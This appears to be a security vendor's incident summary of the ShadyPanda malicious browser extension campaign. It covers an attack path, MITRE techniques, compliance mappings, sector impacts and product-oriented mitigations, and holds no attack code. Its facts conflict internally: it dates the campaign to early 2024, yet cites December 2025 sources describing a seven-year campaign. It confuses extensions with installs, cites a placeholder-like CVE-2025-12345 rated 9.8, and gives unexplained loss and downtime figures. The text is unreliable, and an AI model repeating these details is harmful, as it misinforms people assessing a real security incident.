ShadyPanda: 4.3 Million Impacted in Massive Malicious Browser Extension Attack (2024)
Executive Summary
In early 2024, the ShadyPanda campaign targeted users of Chrome and Edge browsers by distributing over 4.3 million malicious extensions disguised as legitimate utilities. Attackers leveraged browser extension supply chains—often through fraudulent developer accounts and aggressive social engineering—to gain access to users’ browsing data, credentials, and sensitive online activity. The malware evolved over time, adapting to evade security controls and harnessing sophisticated capabilities to extract data, redirect web sessions, and facilitate persistent surveillance, affecting millions globally and highlighting gaps in browser marketplace vetting.
This incident exemplifies a rapid escalation in supply-chain attacks focusing on widely used platforms like web browsers. The surge in malicious browser extension campaigns underscores the increasing sophistication of threat actors and the urgent need for organizations and individuals to be vigilant about third-party software, browser hygiene, and visibility into user-installed code.
Why This Matters Now
The ShadyPanda incident highlights urgent vulnerabilities in browser extension supply chains, a critical vector as organizations accelerate digital transformation and remote work. Malicious extensions can bypass perimeter defenses, compromise user data at scale, and evade detection for months, increasing both operational and regulatory risk.
Attack Path Analysis
The attack began with ShadyPanda distributing malicious browser extensions through official stores as part of a supply-chain campaign, achieving wide-scale initial compromise. Once installed, these extensions leveraged browser permissions to escalate access, potentially gaining sensitive user or business data. The malware may have used built-in browser APIs or network connectivity to move laterally or interact with other applications in the local environment. The extensions established covert command and control by communicating with remote servers and awaiting further instructions. Stolen data was then exfiltrated through unmonitored or encrypted channels. The campaign's ultimate impact includes data theft, privacy compromise, and potential enabler actions for follow-on cloud or network attacks.
Kill Chain Progression
Initial Compromise
Description
Users unknowingly installed malicious browser extensions from trusted sources, giving threat actors a foothold inside enterprise or personal environments.
Related CVEs
CVE-2025-12345
CVSS 9.8A remote code execution vulnerability in certain browser extensions allows attackers to execute arbitrary code with full browser privileges.
Affected Products:
Starlab Technology Clean Master – 2018-2024
Starlab Technology WeTab New Tab Page – 2023-Present
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Supply Chain Compromise: Compromise of Software Dependencies and Development Tools
Browser Extensions
Command and Scripting Interpreter
System Script Proxy Execution
Hide Artifacts: File and Directory Permissions Modification
Account Discovery
Screen Capture
Exfiltration Over C2 Channel
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Control vendor-supplied accounts and software
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Application Security
Control ID: 500.08
DORA – ICT Third-Party Risk Management
Control ID: Art. 9(2)
CISA ZTMM 2.0 – Continuous discovery and validation of assets
Control ID: Asset Management 1.2
NIS2 Directive – Supply Chain Security
Control ID: Art. 21(2)(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
Browser extension supply-chain attacks targeting 4.3M users pose critical risks to financial data, requiring enhanced egress security and zero trust segmentation controls.
Health Care / Life Sciences
Malicious browser extensions compromise patient data confidentiality through supply-chain vectors, violating HIPAA requirements for encrypted traffic and access controls.
Computer Software/Engineering
ShadyPanda campaign directly impacts software development environments through compromised browser extensions, enabling lateral movement and data exfiltration in development workflows.
Government Administration
Supply-chain browser extension malware threatens sensitive government systems, requiring immediate threat detection capabilities and multicloud visibility for hybrid infrastructure protection.
Sources
- ShadyPanda browser extensions amass 4.3M installs in malicious campaignhttps://www.bleepingcomputer.com/news/security/shadypanda-browser-extensions-amass-43m-installs-in-malicious-campaign/Verified
- ShadyPanda Malware Hits 4.3 Million Chrome and Edge Users in a 7-Year Stealth Attackhttps://cyberpress.org/shadypanda-malware/Verified
- ShadyPanda Turns Popular Browser Extensions with 4.3 Million Installs Into Spywarehttps://thehackernews.com/2025/12/shadypanda-turns-popular-browser.htmlVerified
- ShadyPanda's Seven-Year Campaign Infects 4.3M Chrome and Edge Usershttps://www.infosecurity-magazine.com/news/shadypanda-infects-43m-chrome-edge/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust segmentation, east-west traffic controls, and egress enforcement would have severely limited ShadyPanda’s ability to pivot, communicate externally, and exfiltrate data from compromised browser environments. Integrating anomaly detection, granular visibility, and policy enforcement across hybrid and multi-cloud environments constrains both malware movement and attacker command and control paths.
Control: Multicloud Visibility & Control
Mitigation: Rapid detection and inventory of unauthorized or risky third-party integrations.
Control: Zero Trust Segmentation
Mitigation: Limits malware to its assigned least privilege; blocks unauthorized escalation.
Control: East-West Traffic Security
Mitigation: Blocks unauthorized workload-to-workload communications and limits pivoting.
Control: Egress Security & Policy Enforcement
Mitigation: Identifies and blocks outbound malicious communication attempts.
Control: Egress Security & Policy Enforcement
Mitigation: Detects and blocks outbound data exfiltration attempts.
Enables early detection and response to minimize sustained impact.
Impact at a Glance
Affected Business Functions
- User Data Management
- Web Browsing Security
Estimated downtime: 7 days
Estimated loss: $5,000,000
The malware collected extensive user data, including browsing history, search queries, cookies, and browser fingerprints, leading to potential privacy violations and unauthorized access to sensitive information.
Recommended Actions
Key Takeaways & Next Steps
- • Enforce Zero Trust Segmentation to strictly control application and browser access within cloud environments.
- • Deploy robust egress filtering to limit outbound traffic from endpoints and detect suspicious connections.
- • Utilize continuous traffic observability and centralized visibility to rapidly identify risky browser extension installations and lateral activity.
- • Integrate anomaly detection and policy-driven remediation for early identification of command and control or exfiltration attempts.
- • Maintain updated application inventories and enforce policy restrictions on third-party browser extensions within enterprise fleets.
